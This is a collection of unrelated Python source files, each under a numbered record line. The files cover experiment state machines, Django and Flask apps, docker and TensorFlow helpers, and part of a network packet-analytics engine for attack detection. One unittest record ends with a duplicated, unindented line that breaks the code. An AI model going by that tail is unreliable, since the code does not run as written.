            'InterTrial'   : InterTrial(self),
            'Reward'       : Reward(self),
            'Sleep'        : Sleep(self),
            'OffTime'      : OffTime(self),
            'Exit'         : exitState}
    def entry(self): # updates stateMachine from Database entry - override for timing critical transitions
        self.StateMachine.status = self.logger.get_setup_info('status')
        self.logger.update_state(self.__class__.__name__)
    def run(self):
        self.StateMachine.run()
    def is_sleep_time(self):
        """Return True while the wall clock is outside the configured run window."""
        now = datetime.now()
        t = datetime.strptime(self.params['start_time'], "%H:%M:%S")
        start = now.replace(hour=0, minute=0, second=0) + timedelta(hours=t.hour, minutes=t.minute, seconds=t.second)
        t = datetime.strptime(self.params['stop_time'], "%H:%M:%S")
        stop = now.replace(hour=0, minute=0, second=0) + timedelta(hours=t.hour, minutes=t.minute, seconds=t.second)
        # a stop time earlier than start means the window spans midnight
        if stop < start:
            stop = stop + timedelta(days=1)
        time_restriction = now < start or now > stop
        return time_restriction
class Prepare(State):
    """Initial state: set up the stimulus, then start (or sleep)."""

    def run(self):
        self.stim.setup()

    def next(self):
        if not self.is_sleep_time():
            return states['PreTrial']
        return states['Sleep']
class PreTrial(State):
    """Wait for the animal to initiate before starting a trial."""
    def entry(self):
        # prepare the next condition and behavior, then start the wait timer
        self.stim.prepare()
        self.beh.prepare(self.stim.curr_cond)
        self.timer.start()
        self.logger.update_state(self.__class__.__name__)
    def run(self): pass
    def next(self):
        if self.beh.is_ready(self.stim.curr_cond['init_duration']):
            return states['Trial']
        elif self.is_sleep_time():
            return states['Sleep']
        else:
            if self.timer.elapsed_time() > 5000: # occasionally get control status
                self.timer.start()
                self.StateMachine.status = self.logger.get_setup_info('status')
                self.logger.ping()
            return states['PreTrial']
class Trial(State):
    """Present the stimulus and watch for a response within the trial window."""
    def __init__(self, parent):
        self.__dict__.update(parent.__dict__)
        self.is_ready = 0        # latest readiness flag from the behavior
        self.probe = 0           # probe id the animal licked (0 = none)
        self.resp_ready = False  # True once the response delay has elapsed
        self.trial_start = 0     # logger timestamp of trial start
        # NOTE(review): State.__init__ runs after the parent copy above and
        # replaces self.timer with a fresh Timer -- presumably intentional.
        super().__init__()
    def entry(self):
        self.stim.unshow()
        self.logger.update_state(self.__class__.__name__)
        self.timer.start() # trial start counter
        self.trial_start = self.logger.init_trial(self.stim.curr_cond['cond_hash'])
    def run(self):
        self.stim.present() # Start Stimulus
        self.is_ready = self.beh.is_ready(self.timer.elapsed_time()) # update times
        self.probe = self.beh.is_licking(self.trial_start)
        # open the response window once the condition's delay has passed
        if self.timer.elapsed_time() > self.stim.curr_cond['delay_duration'] and not self.resp_ready:
            self.resp_ready = True
        if self.probe > 0: self.beh.update_bias(self.probe)
    def next(self):
        if self.probe > 0 and self.resp_ready: # response to correct probe
            return states['Reward']
        elif self.timer.elapsed_time() > self.stim.curr_cond['trial_duration']: # timed out
            return states['InterTrial']
        else:
            return states['Trial']
    def exit(self):
        self.logger.log_trial()
        self.stim.unshow((0, 0, 0))
        self.logger.ping()
class InterTrial(State):
    """Pause between trials; route to sleep/offtime when conditions are met."""
    def run(self):
        pass
    def next(self):
        # priority: sleep window > satiation > intertrial timeout
        if self.is_sleep_time():
            return states['Sleep']
        elif self.beh.is_hydrated():
            return states['OffTime']
        elif self.timer.elapsed_time() > self.stim.curr_cond['intertrial_duration']:
            return states['PreTrial']
        else:
            return states['InterTrial']
class Reward(State):
    """Deliver the reward, blank the screen, then return to the inter-trial pause."""
    def run(self):
        self.beh.reward()
        self.stim.unshow([0, 0, 0])
    def next(self):
        return states['InterTrial']
class Sleep(State):
    """Idle state during the configured sleep window; screen is blanked."""
    def entry(self):
        self.logger.update_state(self.__class__.__name__)
        self.logger.update_setup_status('sleeping')
        self.stim.unshow([0, 0, 0])
    def run(self):
        # keep-alive ping while dozing; poll every 5 s
        self.logger.ping()
        time.sleep(5)
    def next(self):
        if self.is_sleep_time() and self.logger.get_setup_info('status') == 'sleeping':
            return states['Sleep']
        elif self.logger.get_setup_info('status') == 'sleeping': # if wake up then update session
            self.logger.update_setup_status('running')
            return states['Exit']
        else:
            return states['PreTrial']
class OffTime(State):
    """Idle state after the animal is satiated; waits for sleep or stop."""
    def entry(self):
        self.logger.update_state(self.__class__.__name__)
        self.logger.update_setup_status('offtime')
        self.stim.unshow([0, 0, 0])
    def run(self):
        # keep-alive ping while idle; poll every 5 s
        self.logger.ping()
        time.sleep(5)
    def next(self):
        if self.is_sleep_time():
            return states['Sleep']
        elif self.logger.get_setup_info('status') == 'stop': # if wake up then update session
            return states['Exit']
        else:
            return states['OffTime']
class Exit(State):
    """Terminal state: release behavior hardware and close the stimulus."""
    def run(self):
        self.beh.cleanup()
        self.stim.close()
class Uniform(Stimulus):
    """ This class handles the presentation of Movies with an optimized library for Raspberry pi"""
    # NOTE(review): pygame and QUIT are not imported here -- presumably
    # re-exported by `from Stimulus import *`; confirm.
    def setup(self):
        # setup parameters
        self.path = 'stimuli/'       # default path to copy local stimuli
        self.size = (800, 480)       # window size
        self.color = [127, 127, 127] # default background color
        self.loc = (0, 0)            # default starting location of stimulus surface
        self.fps = 30                # default presentation framerate
        self.phd_size = (50, 50)     # default photodiode signal size in pixels
        self.set_intensity(self.params['intensity'])
        # setup pygame
        pygame.init()
        self.screen = pygame.display.set_mode(self.size)
        self.unshow()
        pygame.mouse.set_visible(0)
        pygame.display.toggle_fullscreen()
    def prepare(self):
        """Pick the next condition (provided by the Stimulus base class)."""
        self._get_new_cond()
    def unshow(self, color=False):
        """update background color"""
        if not color:
            color = self.color
        self.screen.fill(color)
        self.flip()
    def flip(self):
        """ Main flip method"""
        pygame.display.update()
        # drain the event queue; honor window-close requests
        for event in pygame.event.get():
            if event.type == QUIT:
                pygame.quit()
        self.flip_count += 1
    def close(self):
        """Close stuff"""
        pygame.mouse.set_visible(1)
        pygame.display.quit()
        pygame.quit()
    def set_intensity(self, intensity=None):
        """Set the Raspberry Pi display backlight brightness via sysfs."""
        if intensity is None:
            intensity = self.params['intensity']
        cmd = 'echo %d > /sys/class/backlight/rpi_backlight/brightness' % intensity
        os.system(cmd)
|
15,766 | e6514129fa4f9a4249e413d76e0f514540dd20da | """
Tested on python 3.9.7
"""
import unittest
from unittest.mock import patch
import io
from main import checkIsGraduated
class TestIsGraduatedOrNot(unittest.TestCase):
    """
    Tests for checkIsGraduated: stdin is patched with canned answers and
    stdout is captured into a StringIO for assertions.
    """
    # reusable decorator that swaps sys.stdout for a StringIO
    mock_stdout = patch('sys.stdout', new_callable=io.StringIO)
    """
    Should be successfull with graduated
    """
    # NOTE(review): the bare string above mislabels this case -- a score
    # of 70 yields "Tidak lulus" (not graduated).
    @mock_stdout
    @patch('builtins.input', side_effect=['test', '70'])
    def test_is_not_graduted(self, _, mock_print):
        checkIsGraduated()
        self.assertEqual(mock_print.getvalue(), 'Nama: test\nNilai: 70\nKeterangan: Tidak lulus\n')
    """
    Should be successfull with not graduated
    """
    # NOTE(review): mislabeled -- 71 is the graduated ("Lulus") case.
    @mock_stdout
    @patch('builtins.input', side_effect=['testing', '71'])
    def test_is_graduted(self, _, mock_print):
        checkIsGraduated()
        self.assertEqual(mock_print.getvalue(), 'Nama: testing\nNilai: 71\nKeterangan: Lulus\n')
    """
    Should raise ValueError when input alphabet or what else except integer
    """
    @patch('builtins.input', side_effect=['test', 'test'])
    def test_is_bad_int_with_alphabet(self, _):
        with self.assertRaises(ValueError) as cm:
            checkIsGraduated()
        self.assertEqual(cm.exception.args[0], ('Bilangan test bukan integer'))
    """
    Should raise ValueError when input float
    """
    @patch('builtins.input', side_effect=['test', '80.5'])
    def test_is_bad_int_with_float(self, _):
        with self.assertRaises(ValueError) as cm:
            checkIsGraduated()
        self.assertEqual(cm.exception.args[0], ('Bilangan 80.5 bukan integer'))
self.assertEqual(cm.exception.args[0], ('Bilangan 80.5 bukan integer'))
if __name__ == '__main__':
unittest.main(verbosity=2) |
15,767 | 29a510119e519795caa742f1226154e558b72ad6 | print("Hello World!")
print("Hello Again")
print("I like typing this")
print("This is fun")
print("Yay! Printing.")
print("I'd much rather you 'not'.")
print('I "said" do not touch this.')
#run this code on terminal (SAVE before running)
#STUDY DRILLS
print("Another Line") #1
#2: print only one line (delete or comment out)
# this turns lines into comments - this code does not run
|
15,768 | 1f74548fb76cd973eb3ecaec8a889191b4f463e6 | from django.contrib import admin
from core.models import Entry, Member
from datetime import datetime
class EntryAdmin(admin.ModelAdmin):
    """Read-only admin view of Entry rows plus a bulk sign-up action.

    All add/change/delete permissions are disabled, so entries can only
    be inspected and acted on via the custom action below.
    """

    list_display = ['uid', 'date', 'approved', 'member']
    list_filter = ('date', 'approved', 'member')
    actions = ['sign_up_as_member']

    def has_add_permission(self, request):
        # Entries are never created through the admin.
        return False

    def has_change_permission(self, request, obj=None):
        return False

    def has_delete_permission(self, request, obj=None):
        return False

    def sign_up_as_member(self, request, queryset):
        """Create (or re-save) a Member for every selected entry whose
        UID is not yet approved."""
        for obj in queryset:
            if not obj.approved:
                uid = obj.uid
                try:
                    member = Member.objects.get(uid=uid)
                except Member.DoesNotExist:
                    # Only the narrow "no such member" case creates one.
                    # The previous bare `except:` also swallowed real
                    # database errors (and even KeyboardInterrupt).
                    member = Member(uid=uid)
                member.save()
    sign_up_as_member.short_description = "Sign up the selected UIDs as members."
class MemberAdmin(admin.ModelAdmin):
    """Standard admin listing for Member rows, filterable by join date."""
    list_display = ['uid', 'join_date', 'name', 'student_id']
    list_filter = ['join_date']
admin.site.register(Entry, EntryAdmin)
admin.site.register(Member, MemberAdmin)
|
15,769 | 2f6a309e54d356fa5b3238e0a3068ef749cf4af5 | # -*- coding: utf-8 -*-
from flask import Flask
from flask import render_template
#from flask.ext.twisted import Twisted
from flask_twisted import Twisted
app = Flask(__name__)
@app.route('/')
@app.route('/<name>')
def index(name=None):
    """Render hello.html, greeting the optional path segment *name*."""
    # Parenthesised print works on both Python 2 and 3; the original
    # bare `print '...'` statement is a SyntaxError on Python 3.
    print('come into index')
    return render_template('hello.html', name=name)
# Serve the Flask app through the Twisted reactor.
twisted = Twisted(app)

if __name__ == "__main__":
    # print() form is valid on Python 2 and 3 alike.
    print('come into main')
    twisted.run(host='0.0.0.0', port=13579, debug=False)
    #app.run(host='0.0.0.0',port=13579, debug=False)
|
15,770 | 552533fb8397798ab0b064372e9461109bb2f431 | from django.contrib import admin
from django.urls import path,include
from sitetest.views import index, consumo, model_form_upload, printer, pdf
app_name = 'sitetest'
# URL routes for the sitetest app.
urlpatterns = [
    path('', index, name='site_index'),  # landing page
    path('<int:cliente_id>/consumo', consumo, name='consumo'),  # per-client usage
    path('carga/', model_form_upload, name='carga'),  # file upload form
    path('printer/', printer, name='printer'),
    path('pdf/', pdf, name='pdf'),
]
|
15,771 | d2d1a9b80a46ffdba59d0961ddcf1bbeae90fde8 | # coding: utf-8
from __future__ import print_function
import subprocess
import docker
from .utils import new_docker_client
from docker.errors import APIError
def get_repository_name(project, stage):
    """Build the lower-cased docker repository name for a build stage.

    Result has the form ``<project>.<job>.<stage>``, all lower case.
    """
    parts = (project.name, project.current_job.name, stage)
    return "{0}.{1}.{2}".format(*parts).lower()
def get_tag_with_hash(tag, hash):
    """Join a tag and a hash with a dash, e.g. ('v1', 'abc') -> 'v1-abc'."""
    return "%s-%s" % (tag, hash)
class Image(object):
    """Wrapper around a local docker image identified by repository:tag."""

    def __init__(self, repository, tag):
        self.repository = repository
        self.tag = tag
        self.client = new_docker_client()
        # Images sharing the repository but not this exact repo:tag;
        # populated by _fetch_docker_image() and purged by create_image().
        self.old_versions = []
        self._fetch_docker_image()

    @property
    def id(self):
        # Raises TypeError if the image does not exist (docker_image is None).
        return self.docker_image['Id']

    @property
    def repo_tag(self):
        """'repository:tag', or just the repository when tag is falsy."""
        if self.tag:
            return "{}:{}".format(self.repository, self.tag)
        else:
            return self.repository

    def create_image(self, dockerfile):
        """Remove stale versions, then `docker build` the image if absent."""
        for i in self.old_versions:
            image_id = i['Id']
            try:
                self.client.remove_image(image_id)
            except APIError as e:
                # Best-effort cleanup (e.g. image still in use by a container).
                print("couldn't delete docker image {}".format(image_id))
        try:
            if not self.docker_image:
                print("creating image {0}".format(self.repo_tag))
                subprocess.check_call(
                    ['docker', 'build', '--rm', '-t', self.repo_tag, '.'],
                    cwd=dockerfile.path_dir)
                self._fetch_docker_image()
        except Exception as e:
            print("failed creating image {0}".format(self.repo_tag))
            raise e

    def exists(self):
        """True when the repo:tag is present locally."""
        return bool(self.docker_image)

    def remove(self):
        """Delete the local image by id."""
        self.client.remove_image(self.docker_image['Id'])

    def _fetch_docker_image(self):
        """Cache the matching image dict (or None) plus any stale versions."""
        images = self.client.images(name=self.repository)
        self.docker_image = next(
            (i for i in images
             if self.repo_tag in i['RepoTags']),
            None)
        if not self.docker_image:
            self.old_versions = images
class ImageDoesNotExistError(Exception):
    """Raised when a docker image lookup by name finds nothing."""

    def __init__(self, name):
        # The image name that could not be found.
        self.name = name

    def __str__(self):
        # Return the message itself; the previous `repr(...)` wrapped the
        # whole message in an extra pair of quotes.
        return "Image '{0}' not found".format(self.name)
|
15,772 | c0ebef47af3f5c8cadd6af3921d01786e0fa349e | [
["--SE:H", "W-S-:Bs", ],
["-N-E:Be", "WN--:X", ],
]
|
15,773 | 91ec070ea730d0e464c2cfca2c33ec264bb446ce | #!/usr/bin/env python
import mongoUtils
# Parse the standard mongoUtils CLI options, then create a compound index
# on failedMessage (first status-history status + destination broker name).
parser = mongoUtils.create_default_argument_parser()
options = parser.parse_args()
mongoUtils.execute_mongo_command(options, """db.getCollection("failedMessage").createIndex({"statusHistory.0.status": 1, "destination.brokerName": 1})""")
15,774 | 6ef0ed141a50be428d03d0535153285f442cfab4 | from application import app
# Build the Flask application via the factory in `application.app`.
flask_app = app.create_app()
if __name__ == "__main__":
    # NOTE(review): debug=True enables the reloader/debugger -- dev only.
    flask_app.run(debug=True)
15,775 | 0d378c42a0833dc42b38efe7709fce677088c44e | class CodeGenerator:
from pymongo import MongoClient
import datetime
client = MongoClient()
codes = client.makestorybot.codes
@staticmethod
def build_block(size):
from random import choice
from string import ascii_letters, digits
return ''.join(choice(ascii_letters + digits) for _ in range(size))
def __init__(self, client=True):
if not client:
import threading
watcher = threading.Thread(target=self.code_watcher, args=(), daemon=True)
watcher.start()
def code_add(self):
generated_code = self.build_block(8)
while self.codes.count_documents({'code': generated_code}) != 0:
generated_code = self.build_block(8)
one_code = {'code': generated_code, 'expired': self.datetime.datetime.now() + self.datetime.timedelta(days=3)}
self.codes.insert_one(one_code)
return generated_code
def code_watcher(self):
from time import sleep
while True:
self.codes.delete_many({'expired': {'$lte': self.datetime.datetime.now()}})
sleep(60)
def code_use(self, one_code):
if self.codes.delete_one({'code': one_code}).deleted_count > 0:
return True
return False
if __name__ == '__main__':
Generator = CodeGenerator(client=False)
print(Generator.build_block(20))
# Generator.code_add()
#time.sleep(10)
#
# two = codes.find()
# for one in codes.find({'code': 'V4H8OpvI'}):
# print(one['expired'] - datetime.datetime.now())
#
# codes.insert_one(one_code)
|
15,776 | 905ba9c52fc806e63379375a91f800e196684dfd | import vampytest
from os.path import join as join_paths
from types import FunctionType
from ..loading import find_dot_env_file
def test__find_dot_env_file__0():
    """
    Tests whether ``find_dot_env_file`` works as intended.

    Case: Launched location is `None`.
    """
    find_launched_location = lambda : None
    expected_output = None
    # Rebuild the function with a patched globals dict so the stubbed
    # find_launched_location is used instead of the real dependency.
    find_dot_env_file_copy = FunctionType(
        find_dot_env_file.__code__,
        {**find_dot_env_file.__globals__, 'find_launched_location': find_launched_location},
        find_dot_env_file.__name__,
        find_dot_env_file.__defaults__,
        find_dot_env_file.__closure__,
    )
    output = find_dot_env_file_copy()
    vampytest.assert_instance(output, str, nullable = True)
    vampytest.assert_eq(output, expected_output)


def test__find_dot_env_file__1():
    """
    Tests whether ``find_dot_env_file`` works as intended.

    Case: Env file not exists.
    """
    base_location = 'test'
    find_launched_location = lambda : join_paths(base_location, '__init__.py')
    is_file = lambda path : False
    expected_output = None
    # Patch both the location lookup and the filesystem check.
    find_dot_env_file_copy = FunctionType(
        find_dot_env_file.__code__,
        {**find_dot_env_file.__globals__, 'find_launched_location': find_launched_location, 'is_file': is_file},
        find_dot_env_file.__name__,
        find_dot_env_file.__defaults__,
        find_dot_env_file.__closure__,
    )
    output = find_dot_env_file_copy()
    vampytest.assert_instance(output, str, nullable = True)
    vampytest.assert_eq(output, expected_output)


def test__find_dot_env_file__2():
    """
    Tests whether ``find_dot_env_file`` works as intended.

    Case: Env file exists.
    """
    base_location = 'test'
    find_launched_location = lambda : join_paths(base_location, '__init__.py')
    is_file = lambda path : True
    # When the .env exists it should sit next to the launched __init__.py.
    expected_output = join_paths(base_location, '.env')
    find_dot_env_file_copy = FunctionType(
        find_dot_env_file.__code__,
        {**find_dot_env_file.__globals__, 'find_launched_location': find_launched_location, 'is_file': is_file},
        find_dot_env_file.__name__,
        find_dot_env_file.__defaults__,
        find_dot_env_file.__closure__,
    )
    output = find_dot_env_file_copy()
    vampytest.assert_instance(output, str, nullable = True)
    vampytest.assert_eq(output, expected_output)
|
15,777 | 0f7ef1dee85f6f7f3a11312d14f8bfa4e3276a69 | import tensorflow as tf
import numpy as np
import cv2
import time
import os
import sys
# some image loader helpers
def getOptimizer(cfgs, learning_rate):
    """Build the tf.train optimizer named in cfgs['train']['optimizer'].

    Supported names: 'adam', 'momentum', 'gradientDescent', 'RMSProp'.
    NOTE(review): falls through and returns None for any other name,
    which fails later with an unhelpful error -- consider raising.
    """
    type_ = cfgs['train']['optimizer']
    momentum = cfgs['train']['momentum']
    if(type_ == 'adam'):
        return tf.train.AdamOptimizer(learning_rate=learning_rate)
    if(type_ == 'momentum'):
        return tf.train.MomentumOptimizer(learning_rate=learning_rate, momentum=momentum)
    if(type_ == 'gradientDescent'):
        return tf.train.GradientDescentOptimizer(learning_rate=learning_rate)
    if(type_ == 'RMSProp'):
        return tf.train.RMSPropOptimizer(learning_rate=learning_rate)
# make a session with some config settings as well
# - you can modify this if you want to add anymore config settings
# - additionally the gpu fraction is .4 by default
def get_session(gpu_fraction=0.4):
    '''Assume that you have 6GB of GPU memory and want to allocate ~2GB'''
    # TF1-style session with growable GPU memory capped at gpu_fraction
    # and two intra-op threads.
    num_threads = 2
    # gives error that has to deal with the version of tensorflow, and the cudNN version as well
    #gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=gpu_fraction)
    #return tf.Session(config=tf.ConfigProto(gpu_options=gpu_options, intra_op_parallelism_threads=num_threads))
    config = tf.ConfigProto() #allow_soft_placement=True, log_device_placement=False)
    config.gpu_options.allow_growth = True
    config.allow_soft_placement=False
    config.gpu_options.per_process_gpu_memory_fraction=gpu_fraction
    config.intra_op_parallelism_threads=num_threads
    #config.log_device_placement=True
    sess = tf.Session(config=config)
    return sess
# for loading a single test image
def get_test_image(cfgs, image_path, w=128, h=256, standardize=True, channel_swap=None):
    """Load one test image and its one-hot label.

    The class name is parsed from the filename using
    cfgs['data']['label_seperator']; when cfgs['data']['root_paths'] is
    falsy the path is prefixed with cfgs['data']['data_start'].
    Returns (image, one_hot_label).
    """
    if(cfgs['data']['root_paths']):
        image_path = image_path.replace('\\', '/')
        image = cv2.imread(image_path)
        label = image_path.split('/')[-1].split(cfgs['data']['label_seperator'])[0]
    else:
        image = cv2.imread(cfgs['data']['data_start'] + image_path)
        label = image_path.split(cfgs['data']['label_seperator'])[0]
    image = cv2.resize(image, (w, h))
    if(standardize):
        # zero-mean, unit-variance standardisation
        image = (image - np.mean(image)) / (np.std(image))
    if(channel_swap is not None):
        # e.g. BGR -> RGB reorder
        image = image[:,:,channel_swap]
    # Soem more label stuff
    label = cfgs['data']['classes'].index(label)
    bin_label = [0 for x in range(len(cfgs['data']['classes']))]
    bin_label[label] = 1
    return image, bin_label
# return an image batch, usually for training
def get_images(cfgs, batch_paths, ids, w=128, h=256, augment=True, standardize=True, channel_swap=None):
    """Load a batch of training images and one-hot labels.

    :param batch_paths: list of image paths
    :param ids: indices into batch_paths to load
    :param augment: when True, each image is horizontally flipped with
        probability 0.5
    Returns (images, labels) as parallel lists.
    """
    images = []
    labels = []
    for idx, b in enumerate(ids):
        path_ = batch_paths[b]
        path_ = path_.replace('\\','/')
        if(cfgs['data']['root_paths']):
            image = cv2.imread(path_)
            label = path_.split('/')[-1].split(cfgs['data']['label_seperator'])[0]
        # else add the base path to it
        else:
            image = cv2.imread(cfgs['data']['data_start'] + path_)
            label = path_.split(cfgs['data']['label_seperator'])[0]
        # resize it
        image = cv2.resize(image, (w,h))
        # sometimes flip the image
        # - If more augmentation is needed,
        #   add additional lines here
        if (augment and np.random.random() > 0.5):
            image = np.fliplr(image)
        # normalize the image
        #image = normalize(image)
        if(standardize):
            image = (image - np.mean(image)) / (np.std(image))
        # default is none but sometimes we might want to swap the channels
        if(channel_swap is not None):
            image = image[:,:,channel_swap]
        images.append(image)
        label = cfgs['data']['classes'].index(label)
        bin_label = [0 for x in range(len(cfgs['data']['classes']))]
        bin_label[label] = 1
        labels.append(bin_label)
    return images, labels
# A get batch helper
# - This function is a helper to call get_images
# - needs a path array and an ids array that holds all the indicies in the paths array
def get_batch(cfgs, paths, ids, batch_size=5, standardize=False, w=128, h=256):
    """Sample batch_size indices (with replacement) and load them.

    Thin wrapper over get_images(); see that function for details.
    """
    batch_ids = np.random.choice(ids,batch_size)
    return get_images(cfgs, paths, batch_ids, standardize=standardize, w=w, h=h)
# file system helpers
|
15,778 | 9a8d4b9b3af7b964c318a58d6339453045dac676 | # !/usr/bin/env python
# -*- coding: utf-8 -*-
from logbook.base import NOTSET
from logbook.handlers import Handler, StringFormatterHandlerMixin
from rqalpha.environment import Environment
from rqalpha.interface import AbstractMod
from rqalpha.utils.logger import user_system_log, user_log
class LogHandler(Handler, StringFormatterHandlerMixin):
    """Logbook handler that forwards formatted records to a callback.

    The callback receives (dt, text, level_name, mod_config=...), where
    dt is the rqalpha calendar datetime -- not wall-clock time -- so log
    lines line up with simulated time.
    """
    def __init__(self, send_log_handler, mod_config, level=NOTSET, format_string=None, filter=None, bubble=False):
        Handler.__init__(self, level, filter, bubble)
        StringFormatterHandlerMixin.__init__(self, format_string)
        self.send_log_handler = send_log_handler
        self.mod_config = mod_config

    def _write(self, level_name, item):
        # Use the strategy's calendar time for the timestamp.
        dt = Environment.get_instance().calendar_dt
        self.send_log_handler(dt, item, level_name, mod_config=self.mod_config)

    def emit(self, record):
        msg = self.format(record)
        self._write(record.level_name, msg)
class CustomLogHandlerMod(AbstractMod):
    """rqalpha mod that appends user/system log lines to a file."""

    def _send_log(self, dt, text, log_tag, mod_config):
        # File is reopened per line; mod_config.log_mode controls
        # append vs overwrite -- presumably 'a', verify in config.
        with open(f'{mod_config.log_file}', mode=mod_config.log_mode) as f:
            f.write(f'[{dt}] {log_tag}: {text}\n')

    def start_up(self, env, mod_config):
        # Attach our handler to both the user and system loggers.
        user_log.handlers.append(LogHandler(self._send_log, mod_config, bubble=True))
        user_system_log.handlers.append(LogHandler(self._send_log, mod_config, bubble=True))

    def tear_down(self, code, exception=None):
        # Nothing to clean up; the file is opened and closed per write.
        pass
def load_mod():
    """rqalpha mod entry point: return the mod instance."""
    return CustomLogHandlerMod()
|
15,779 | 0e13fece6cb7267ccf40bd3dcb3109efdf1fbdef | import matplotlib.pyplot as plt
import numpy as np
bitmap = np.fabs(np.random.randn(100, 100))
np.min(bitmap)
np.max(bitmap)
bitmap = bitmap - np.min(bitmap)
bitmap = bitmap/np.max(bitmap)
bitmap[:, 45:55] = 1
img = plt.imshow(bitmap)
plt.show()
|
15,780 | f6168ac3bb556752b5072a8ca3c22e9a745cacac | # Copyright (c) 2019 Cable Television Laboratories, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import abc
import datetime
import logging
import threading
import time
from anytree import search, Node, RenderTree
from scapy.all import sniff
from scapy.layers.inet import IP, UDP, TCP
from scapy.layers.inet6 import IPv6
from scapy.layers.l2 import Ether
from trans_sec.consts import UDP_PROTO, UDP_TRPT_DST_PORT, IPV4_TYPE, \
UDP_INT_DST_PORT, IPV6_TYPE
from trans_sec.packet.inspect_layer import (
IntHeader, IntMeta1, IntMeta2, IntShim, SourceIntMeta, TelemetryReport,
EthInt)
logger = logging.getLogger('oinc')
class PacketAnalytics(object):
    """
    Analytics Engine class
    """
    def __init__(self, sdn_interface, packet_count=100, sample_interval=60):
        """
        Constructor
        :param sdn_interface: the HTTP interface to the SDN Controller
        :param packet_count: the number of packets to trigger an attack
        :param sample_interval: the interval in seconds used for counting the
                                packets
        """
        self.sdn_interface = sdn_interface
        self.packet_count = packet_count
        self.sample_interval = sample_interval
        # per-flow packet timestamp lists, keyed by subclasses
        self.count_map = dict()
        # event used to signal the scapy sniffer loop to exit
        self.sniff_stop = threading.Event()
        logger.debug("Completed binding packet layers")

    def start_sniffing(self, iface, udp_dport=UDP_TRPT_DST_PORT):
        """
        Starts the sniffer thread
        :param iface: the interface to sniff
        :param udp_dport: the UDP dport to sniff (default 555)
        """
        logger.info("AE monitoring iface %s", iface)
        # Blocks until sniff_stop is set via stop_sniffing().
        sniff(iface=iface,
              prn=lambda packet: self.handle_packet(packet, udp_dport),
              stop_filter=lambda p: self.sniff_stop.is_set())

    def stop_sniffing(self):
        """
        Stops the sniffer thread
        """
        self.sniff_stop.set()

    def handle_packet(self, packet, udp_dport):
        """
        Determines whether or not to process this packet
        :param packet: the packet to process
        :param udp_dport: the UDP protocol dport value to filter
        :return T/F - True when an attack has been triggered
        """
        return self.process_packet(packet, udp_dport)

    def _send_attack(self, **attack_dict):
        """
        Sends an HTTP POST to the SDN controllers HTTP interface 'attack'
        :param attack_dict: the data to send
        :raises Exception: due to the remote HTTP POST
        """
        logger.info('Start attack - %s', attack_dict)
        self.sdn_interface.post('attack', attack_dict)

    @abc.abstractmethod
    def process_packet(self, packet, udp_dport=UDP_INT_DST_PORT):
        """
        Processes a packet to determine if an attack is occurring
        :param packet: the packet to process
        :param udp_dport: the UDP port value on which to filter
        :return: T/F - True when an attack has been triggered
        """
        return
def extract_int_data(ether_pkt):
    """
    Parses the required data from the packet
    :param ether_pkt: the packet to parse
    :return: dict with keys devMac/devAddr/dstAddr/dstPort/protocol/packetLen,
             or None when the ethertype is not IPv4/IPv6 or parsing fails
    """
    if ether_pkt.type == IPV4_TYPE:
        ip_pkt = IP(_pkt=ether_pkt.payload)
        logger.debug('IPv4 dst - [%s], src - [%s], proto - [%s]',
                     ip_pkt.dst, ip_pkt.src, ip_pkt.proto)
    elif ether_pkt.type == IPV6_TYPE:
        ip_pkt = IPv6(_pkt=ether_pkt.payload)
        logger.debug('IPv6 dst - [%s], src - [%s], nh - [%s]',
                     ip_pkt.dst, ip_pkt.src, ip_pkt.nh)
    else:
        logger.warn('Unable to process ether type - [%s]', ether_pkt.type)
        return None
    # Walk the stacked INT layers: UDP -> shim -> header -> meta1 ->
    # meta2 -> source meta -> inner TCP/UDP.
    udp_int_pkt = UDP(_pkt=ip_pkt.payload)
    logger.debug('UDP INT sport - [%s], dport - [%s], len - [%s]',
                 udp_int_pkt.sport, udp_int_pkt.dport, udp_int_pkt.len)
    int_shim_pkt = IntShim(_pkt=udp_int_pkt.payload)
    logger.debug('INT Shim next_proto - [%s], npt - [%s], length - [%s]',
                 int_shim_pkt.next_proto, int_shim_pkt.npt,
                 int_shim_pkt.length)
    int_hdr_pkt = IntHeader(_pkt=int_shim_pkt.payload)
    logger.debug('INT Header ver - [%s]', int_hdr_pkt.ver)
    int_meta_1 = IntMeta1(_pkt=int_hdr_pkt.payload)
    logger.debug('INT Meta 1 switch_id - [%s]', int_meta_1.switch_id)
    int_meta_2 = IntMeta2(_pkt=int_meta_1.payload)
    logger.debug('INT Meta 2 switch_id - [%s]', int_meta_2.switch_id)
    source_int_pkt = SourceIntMeta(_pkt=int_meta_2.payload)
    logger.debug('SourceIntMeta switch_id - [%s], orig_mac - [%s]',
                 source_int_pkt.switch_id, source_int_pkt.orig_mac)
    if int_shim_pkt.next_proto == UDP_PROTO:
        tcp_udp_pkt = UDP(_pkt=source_int_pkt.payload)
        logger.debug('TCP sport - [%s], dport - [%s], len - [%s]',
                     tcp_udp_pkt.sport, tcp_udp_pkt.dport, tcp_udp_pkt.len)
    else:
        tcp_udp_pkt = TCP(_pkt=source_int_pkt.payload)
        logger.debug('TCP sport - [%s], dport - [%s]',
                     tcp_udp_pkt.sport, tcp_udp_pkt.dport)
    orig_mac = source_int_pkt.orig_mac
    try:
        out = dict(
            devMac=orig_mac,
            devAddr=ip_pkt.src,
            dstAddr=ip_pkt.dst,
            dstPort=tcp_udp_pkt.dport,
            protocol=int_shim_pkt.next_proto,
            packetLen=len(ether_pkt),
        )
    except Exception as e:
        logger.error('Error extracting header data - %s', e)
        return None
    logger.debug('Extracted header data [%s]', out)
    return out
def extract_trpt_data(udp_packet):
    """
    Parses the required data from the packet
    :param udp_packet: the telemetry-report UDP packet to parse
    :return: dict with choice header fields extracted (see
             extract_int_data), or None on failure
    """
    logger.debug('UDP packet sport [%s], dport [%s], len [%s]',
                 udp_packet.sport, udp_packet.dport, udp_packet.len)
    # Strip the telemetry-report wrapper, then parse the inner INT
    # ethernet frame like a directly sniffed packet.
    trpt_pkt = TelemetryReport(_pkt=udp_packet.payload)
    trpt_eth = EthInt(trpt_pkt.payload)
    logger.debug('TRPT ethernet dst - [%s], src - [%s], type - [%s]',
